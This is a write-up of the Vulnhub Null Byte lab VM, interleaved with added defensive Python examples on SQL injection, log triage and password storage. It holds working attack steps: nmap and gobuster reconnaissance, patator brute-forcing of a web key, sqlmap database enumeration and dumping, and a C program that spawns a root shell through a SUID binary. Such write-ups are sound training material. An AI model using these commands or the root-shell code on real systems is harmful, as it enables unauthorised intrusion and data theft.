# NullByte Walkthrough

Here's my attempt to provide walkthroughs for various VMs from Vulnhub & HTB.

## Null Byte (Vulnhub)

First off we need to identify the IP address the VM spun up on:

```
$ nmap -sn 192.168.1.0/24
```

{% hint style="info" %}
nmap changed the syntax of the ping scan; the older form is:\
nmap -sP 192.168.1.0/24
{% endhint %}

We will need the following code (saved as `ps.c`) if we encounter a SUID binary:

```
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* when run through a SUID-root binary, adopt root's uid/gid and spawn a shell */
    setuid(0);
    setgid(0);   /* setgid, not setguid: there is no setguid() in libc */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
```

We identify which port(s) are listening on the server:

```
nmap -O -v -sS 192.168.1.142
```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKu7l0ge_r_4B5k41J%2Finitial-1.jpg?alt=media\&token=c7b1ba80-ec9a-4840-a235-e632af12f8b3)

We notice a web server on port 80. Port 777 is less obvious, so we use netcat to grab the service banner; it turns out to be the SSH daemon. Once we have a user and a valid password we can attempt to get a shell on the box using:

```
ssh user@192.168.1.142 -p 777
```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKuSinjAP3n0edEP3x%2Fintial-2.jpg?alt=media\&token=16be0b81-20ef-4adc-ab46-03fdd9fcbfe9)

Let's see what other interesting directories we can find by running gobuster with one of the DirBuster wordlists.

```
gobuster dir -u http://192.168.1.142 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
```

Only two directories appear interesting, and there is not much we can do with them: directory listing is disabled on the uploads folder and we need credentials for the phpMyAdmin page.

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKvG53DmDxAA4PjlgB%2Finitial-3.jpg?alt=media\&token=08c9514c-0dad-4be8-89d3-549ab30a17e0)

At this point most people, myself included, didn't realise that the next step is to analyze the default image displayed on the home page.

![default page of webserver](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKvodxj6w0-RaOJ0i3%2Finitial-4.jpg?alt=media\&token=55116c50-5749-4bdf-b623-4ea889739d6f)

The sentence is from an ancient Egyptian proverb. If we run the image (a GIF in this case) through an EXIF metadata reader we can see any text hidden inside the image.

![exif text shown](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKwscVz-lGOy-R0TQk%2Finitial-5.jpg?alt=media\&token=7cf261bd-ae4b-4cd8-ae52-7dcc3d91e616)
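To show where such "hidden" text actually lives, here is an added example (not part of the original walkthrough or the VM): a minimal GIF block walker that pulls out Comment Extension blocks, which is the field an EXIF-style tool reports as "Comment" for a GIF. The sample GIF and its comment are constructed inline so the script runs offline; the comment text is a placeholder, not the VM's.

```python
import struct

# Added example: walk a GIF's block structure and collect Comment Extension
# blocks (label 0xFE). GIF has no EXIF segment; metadata tools show this
# field as "Comment", which is where text hidden in a GIF usually sits.


def _read_subblocks(data, pos):
    """Concatenate GIF data sub-blocks starting at pos; return (payload, next_pos)."""
    out = bytearray()
    while True:
        size = data[pos]
        pos += 1
        if size == 0:                           # block terminator
            return bytes(out), pos
        out += data[pos:pos + size]
        pos += size


def _skip_color_table(packed, pos):
    """Skip a color table if its 'present' bit is set; size is 3 * 2^(n+1) bytes."""
    if packed & 0x80:
        pos += 3 * (2 << (packed & 0x07))
    return pos


def gif_comments(data):
    """Return every comment string embedded in a GIF byte string."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    _w, _h, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    pos = _skip_color_table(packed, 13)
    comments = []
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                       # trailer: end of stream
            break
        if block == 0x21:                       # extension introducer
            label = data[pos + 1]
            payload, pos = _read_subblocks(data, pos + 2)
            if label == 0xFE:                   # comment extension
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:                     # image descriptor (9 bytes follow)
            ipacked = data[pos + 9]
            pos = _skip_color_table(ipacked, pos + 10)
            pos += 1                            # LZW minimum code size
            _, pos = _read_subblocks(data, pos) # compressed pixel data
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos}")
    return comments


def build_sample_gif(comment=b""):
    """Constructed 1x1 GIF89a with an optional comment block (test input only)."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    palette = b"\x00\x00\x00\xff\xff\xff"       # 2-entry global color table
    ext = b""
    if comment:
        ext = b"\x21\xFE"
        for i in range(0, len(comment), 255):   # a sub-block holds at most 255 bytes
            chunk = comment[i:i + 255]
            ext += bytes([len(chunk)]) + chunk
        ext += b"\x00"
    image = (b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
             + b"\x02"                          # LZW minimum code size
             + b"\x02\x44\x01\x00")             # clear code, pixel 0, end-of-information
    return header + palette + ext + image + b"\x3B"


# Constructed sample input; the comment is a placeholder, not the VM's hidden string.
SAMPLE_GIF = build_sample_gif(b"constructed comment: a hidden path would appear here")

if __name__ == "__main__":
    print(gif_comments(SAMPLE_GIF))
```

Because comments are stored as a chain of sub-blocks of at most 255 bytes, the walker concatenates them before decoding; a reader that only looks at the first sub-block would truncate longer hidden strings.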

After some consideration, this text string turns out to be a directory on the web server. At first glance it asks for some key. Here we can only resort to brute force to see whether it's a simple key.\
Viewing the source code reveals a comment along the lines of:

```
<!-- this form isn't connected to mysql, password ain't that complex --!>
```

![text hidden inside image reveals a page asking for a key](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKxesObaZ-cmmhkVHX%2Finitial-6.jpg?alt=media\&token=ffcceac5-cd1c-45c0-9f55-265e641425ba)

```
patator http_fuzz url=http://192.168.1.142/kzMb5nVYJw/index.php method=POST body='key=FILE0' 0=/home/kali/10k-most-common.txt follow=1 -x ignore:fgrep='invalid key'
```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlL1cyTxdC9bLvIvYYy%2Finitial-7.jpg?alt=media\&token=0a443c16-8c14-42aa-b7be-d68abc212389)

Next we move on to the page that is revealed. We put in a search term and it reveals a user called ramses.

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlL28lZ_VkX2Ult7uXX%2Finitial-8.jpg?alt=media\&token=e7fd3526-8aa7-4f27-8f0c-b35205329cae)

Just browsing to (or using curl against):

```
http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=
```

we get the following results:

```
EMP ID :1 EMP NAME : ramses
EMP POSITION :
EMP ID :2 EMP NAME : isis
EMP POSITION : employee
Fetched data successfully
```

These could be two possible users on the system. Next we check whether the page is vulnerable to SQL injection. The quickest way is sqlmap:

```
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= --dbs
```

Lo and behold, we can see all the databases:

```
[10:45:14] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
```

Then we dump the data:

```
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch='DESCRIBE phpmyadmin' --dbs --dump
```
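The walkthrough shows sqlmap finding the injection but not why the search page was injectable or how it would look in the server's logs. The following added example (mine, not the VM's PHP or the walkthrough's code) models the `usrtosearch` search two ways, a concatenated query beside a parameterised one, against a constructed table holding the two employees the page listed, and then triages constructed Apache access-log lines for the same parameter. The column names, the exact-match query and the log lines are assumptions; the VM's real schema and source are not on the page.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed employee table modelled on what the search page returned. Column
# names and the exact-match query are assumptions (the VM's schema is unknown).
EMPLOYEES = [(1, "ramses", ""), (2, "isis", "employee")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (emp_id INTEGER, emp_name TEXT, emp_position TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?)", EMPLOYEES)
    return conn


def search_vulnerable(conn, usrtosearch):
    """String concatenation: the user's input becomes part of the SQL grammar."""
    sql = ("SELECT emp_id, emp_name, emp_position FROM employees "
           f"WHERE emp_name = '{usrtosearch}'")
    return conn.execute(sql).fetchall()


def search_safe(conn, usrtosearch):
    """Bound parameter: the input is only ever a value, never SQL."""
    sql = "SELECT emp_id, emp_name, emp_position FROM employees WHERE emp_name = ?"
    return conn.execute(sql, (usrtosearch,)).fetchall()


# Detection side: triage web-server access logs for the same parameter.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQL_META = ("'", '"', "--", "/*", ";")

# Constructed Apache combined-format lines (not captured from the VM).
SAMPLE_LOG = [
    '192.168.1.10 - - [01/Jan/2021:10:45:14 +0000] "GET /kzMb5nVYJw/420search.php?usrtosearch=ramses HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [01/Jan/2021:10:45:20 +0000] "GET /kzMb5nVYJw/420search.php?usrtosearch=%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [01/Jan/2021:10:45:31 +0000] "GET /kzMb5nVYJw/420search.php?usrtosearch=ramses HTTP/1.1" 200 512 "-" "sqlmap/1.5"',
]


def flag_requests(lines):
    """Return (ip, target, reason) tuples for requests worth a second look."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query)   # parse_qs URL-decodes values
        for value in params.get("usrtosearch", []):
            if any(tok in value for tok in SQL_META):
                hits.append((m["ip"], m["target"], "SQL metacharacters in usrtosearch"))
        if "sqlmap" in m["ua"].lower():
            hits.append((m["ip"], m["target"], "sqlmap user-agent"))
    return hits


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", search_vulnerable(conn, payload))
    print("safe:      ", search_safe(conn, payload))
    for hit in flag_requests(SAMPLE_LOG):
        print("flag:", hit)
```

With the concatenated query a quote in the search term changes the WHERE clause and every row comes back; with the bound parameter the same input is just a name nobody has, so nothing is returned. On the log side, the decoded parameter value and the User-Agent are the two cheapest signals; a real deployment would also count requests per source, since sqlmap sends hundreds of probes per parameter.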

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL2NEATSWmX2P5AmxN%2F-MlL3ts0-6ObQ3IDm--6%2Finitial-9.jpg?alt=media\&token=20a7b6fe-635c-4052-8b28-5f84e2bcc96c)

We're presented with a strange hash string next to the username ramses.

We can use the following site to quickly identify the hash type:\
<https://hashes.com/en/tools/hash_identifier>\
As seen below, it's actually a base64-encoded string.

![base64 decode](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL2NEATSWmX2P5AmxN%2F-MlL5icmzkXA8twBpvX_%2Fintiial-12.jpg?alt=media\&token=c24544ef-4d99-418a-b977-d163a918e787)

Running the MD5 hash through CrackStation shows us a possible password:

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL5oho9BaHaqNpTZY6%2F-MlL6SqQE0W1Natnb86h%2Finitial-13.jpg?alt=media\&token=435e8f44-fa40-4318-a908-d6abf0670f91)
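The two identification steps above (spot the base64 wrapper, then recognise a 32-character hex digest as MD5) and the CrackStation lookup can be reproduced offline. The added example below is mine, not the walkthrough's, and works on a constructed value of the same shape, base64 of an MD5 hex digest; the sample password and wordlist are placeholders, not the VM's. It also shows the defender-side fix, storing passwords with salted, iterated PBKDF2 instead of bare MD5, so the same wordlist check no longer succeeds instantly.

```python
import base64
import binascii
import hashlib
import hmac
import os

HEX_DIGITS = set("0123456789abcdefABCDEF")

# Digest length in hex chars is only a hint: MD5, MD4 and NTLM all give 32 chars.
LENGTH_HINTS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def is_hex(s):
    return bool(s) and len(s) % 2 == 0 and set(s) <= HEX_DIGITS


def identify(value):
    """Classify a stored credential: raw hex digest, base64-wrapped hex digest, or unknown."""
    if is_hex(value):
        return ("raw", LENGTH_HINTS.get(len(value), "unknown length"), value)
    try:
        inner = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return ("unknown", None, value)
    if is_hex(inner):
        return ("base64", LENGTH_HINTS.get(len(inner), "unknown length"), inner)
    return ("unknown", None, value)


def dictionary_check(hex_digest, candidates):
    """Offline equivalent of a lookup service: unsalted MD5 falls to a wordlist at once."""
    for word in candidates:
        if hmac.compare_digest(hashlib.md5(word.encode()).hexdigest(), hex_digest.lower()):
            return word
    return None


def store_password(password, salt=None):
    """Mitigation: per-user salt plus iterated PBKDF2-HMAC-SHA256 instead of bare MD5."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + dk.hex()


def verify_password(password, stored):
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample: base64 of an MD5 hex digest, the same shape as the value the
# walkthrough found. The password and wordlist are placeholders, not the VM's.
SAMPLE_PASSWORD = "sample-pass"
STORED_VALUE = base64.b64encode(
    hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest().encode()).decode()
WORDLIST = ["password", "123456", "letmein", SAMPLE_PASSWORD, "qwerty"]

if __name__ == "__main__":
    kind, algo, digest = identify(STORED_VALUE)
    print(kind, algo, digest)
    print("wordlist hit:", dictionary_check(digest, WORDLIST))
    rec = store_password(SAMPLE_PASSWORD)
    print("pbkdf2 verify:", verify_password(SAMPLE_PASSWORD, rec), verify_password("wrong", rec))
```

The length table is a heuristic, which is why identifier sites list several candidates for a 32-character value; what settles it here is that a wordlist MD5 matches. The salted PBKDF2 record is precisely what a CrackStation-style lookup cannot resolve, because the salt makes every stored value unique and the iteration count makes each guess expensive.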

